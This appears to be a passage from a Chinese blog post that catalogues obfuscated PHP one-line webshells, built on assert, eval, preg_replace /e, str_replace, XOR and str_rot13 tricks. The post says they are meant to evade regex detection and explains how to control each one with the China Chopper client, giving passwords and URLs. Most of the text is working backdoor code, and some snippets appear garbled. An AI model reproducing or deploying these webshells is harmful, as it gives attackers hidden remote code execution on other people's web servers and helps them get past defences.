php 后门

2016-06-17 0 By admin

可以通过以上方法修改assert后门,达到绕过正则:
<?phpassert($_POST[password]);?>
三.变形一句话:
<?php$_GET[‘xxoo’]($_POST[‘cmd’]);?>
客户端用菜刀,密码cmd,url为test.php?xxoo=assert
<?php$_POST[‘xxoo’]($_POST[‘cmd’]);?>
这个是直接发post数据包就OK。
<?php $a=“a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[“cmd”]); ?>
<?php($_=@$_GET[password]).@$_($_POST[xxoo])?>
利用方法:http://localhost/password.php?password=asstrt
原理就是get传递参数assert然后形成@asserT@($_($_POST[xxoo])
<?php$_POST[‘password’]($_POST[‘cmd’]);?
提交post内容形成assert,eval。
四.通过str_replace替换
$a = str_replace(x,””,”axsxxsxexrxxt”)
最后要形成的是$a = assert
五.
<?php @preg_replace(“/[email]/e”,$_POST[‘h’],”error”); ?>
谈谈这个后门吧,这个是用e修饰符,只需要e所在的位置跟最后的”error”正则匹配正确就会$_POST[‘h’]的内容。
那么我们只需要用菜刀<O>h=@assert($_POST[c]);</O>就可以,让h参数执行。
六.
<?php $_=””; $_[+””]=”; $_=”$_”.””; $_=($_[+””]|””).($_[+””]|””).($_[+””]^””); ?> <?php${‘_’.$_}[‘_’](${‘_’.$_}[‘__’]);?>
菜刀里写:http://localhost/2.php?_=assert&__=eval($_POST[‘xxoo’])
密码:xxoo
原理分析你只需要让$_拼接打印即可。
七.
<?php ($b4dboy=$_POST[‘1′])&&@preg_replace(‘/ad/e,,’@,.str_rot13(‘riny,).,($b4dboy)’,’add’); ?>
‘@’.str_rot13(‘riny’)相当于@eval,然后你懂的。
其实大都数原理都是如此,加了变形,解析后依然是原装语句eval,assert。